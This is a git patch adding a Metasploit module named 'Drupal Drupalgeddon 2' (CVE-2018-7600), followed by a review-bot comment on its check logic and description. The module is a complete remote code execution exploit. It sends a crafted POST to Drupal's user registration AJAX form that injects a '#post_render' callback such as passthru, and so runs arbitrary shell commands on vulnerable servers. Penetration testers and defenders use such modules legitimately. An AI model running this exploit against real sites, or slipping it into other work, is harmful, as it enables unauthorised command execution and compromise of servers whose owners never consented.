From 6838a4e8c47c1450f60f1083752e648c9da2cc93 Mon Sep 17 00:00:00 2001
From: William Vu
Date: Fri, 13 Apr 2018 18:15:28 -0500
Subject: [PATCH] Add Drupal Drupalgeddon 2
---
 .../unix/webapp/drupal_drupalgeddon2.rb | 103 ++++++++++++++++++
 1 file changed, 103 insertions(+)
 create mode 100644 modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
diff --git a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
new file mode 100644
index 0000000000000..7d305ec3309ba
--- /dev/null
+++ b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb
@@ -0,0 +1,103 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Drupal Drupalgeddon 2',
+ 'Description' => %q{
+ This module exploits a vulnerability.
+ },
+ 'Author' => [
+ 'Jasper Mattsson', # Vulnerability discovery
+ 'a2u', # Proof of concept
+ 'Nixawk', # Proof of concept
+ 'wvu' # Metasploit module
+ ],
+ 'References' => [
+ ['CVE', '2018-7600'],
+ ['URL', 'https://www.drupal.org/sa-core-2018-002'],
+ ['URL', 'https://greysec.net/showthread.php?tid=2912'],
+ ['URL', 'https://research.checkpoint.com/uncovering-drupalgeddon-2/'],
+ ['URL', 'https://github.com/a2u/CVE-2018-7600'],
+ ['URL', 'https://github.com/nixawk/labs/issues/19']
+ ],
+ 'DisclosureDate' => 'Mar 28 2018',
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'unix',
+ 'Arch' => ARCH_CMD,
+ 'Privileged' => false,
+ 'Targets' => [
+ ['Drupal < 7.58, < 8.3.9, < 8.4.6, < 8.5.1', {}]
+ ],
+ 'DefaultTarget' => 0,
+ 'DefaultOptions' => {
+ 'PAYLOAD' => 'cmd/unix/generic',
+ 'CMD' => 'id; uname -a'
+ }
+ ))
+
+ register_options([
+ OptString.new('TARGETURI', [true, 'Path to Drupal install', '/']),
+ OptBool.new('CLEAN_URLS', [false, 'If clean URLs are enabled', true]),
+ OptBool.new('DUMP_OUTPUT', [false, 'If output should be dumped', true])
+ ])
+ end
+
+ def check
+ token = Rex::Text.rand_text_alphanumeric(8..42)
+
+ res = exploit(code: "echo #{token}")
+
+ if res && res.body.include?(token)
+ return CheckCode::Vulnerable
+ end
+
+ CheckCode::Safe
+ end
+
+ # TODO: passthru() may be disabled, so try others
+ def exploit(func: 'passthru', code: payload.encoded)
+ if datastore['CLEAN_URLS']
+ register = '/user/register'
+ else
+ register = '?q=user/register'
+ end
+
+ print_status("Executing on target: #{code}")
+
+ res = send_request_cgi(
+ 'method' => 'POST',
+ 'uri' => normalize_uri(target_uri.path, register),
+ 'vars_get' => {
+ 'element_parents' => 'account/mail/#value',
+ 'ajax_form' => 1,
+ '_wrapper_format' => 'drupal_ajax'
+ },
+ 'vars_post' => {
+ 'form_id' => 'user_register_form',
+ '_drupal_ajax' => 1,
+ 'mail[#type]' => 'markup',
+ 'mail[#post_render][]' => func,
+ 'mail[#markup]' => code
+ }
+ )
+
+ if res.nil? || res.code != 200
+ print_error("Unexpected reply: #{res.inspect}")
+ return nil
+ end
+
+ print_line(res.body) if datastore['DUMP_OUTPUT']
+
+ res
+ end
+
+end
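Review bot: `check` reports `CheckCode::Safe` whenever `exploit` returns nil, which it does for a connection failure, a timeout or any non-200 reply, so an unreachable or WAF-fronted host is indistinguishable from a patched one; add `return CheckCode::Unknown unless res` before the body test so only a 200 response that lacks the token yields Safe. The check is also intrusive — it executes `echo` through the same request as the exploit — and the 'Description' placeholder `This module exploits a vulnerability.` should say so and name the flaw, i.e. that Drupal's Form API accepts an attacker-supplied `#post_render` callback in the user registration AJAX form (CVE-2018-7600, SA-CORE-2018-002), so that operators and detection engineers know what the module sends. As a point of style, the four-line if/else in `exploit` reads better as `register = datastore['CLEAN_URLS'] ? '/user/register' : '?q=user/register'`.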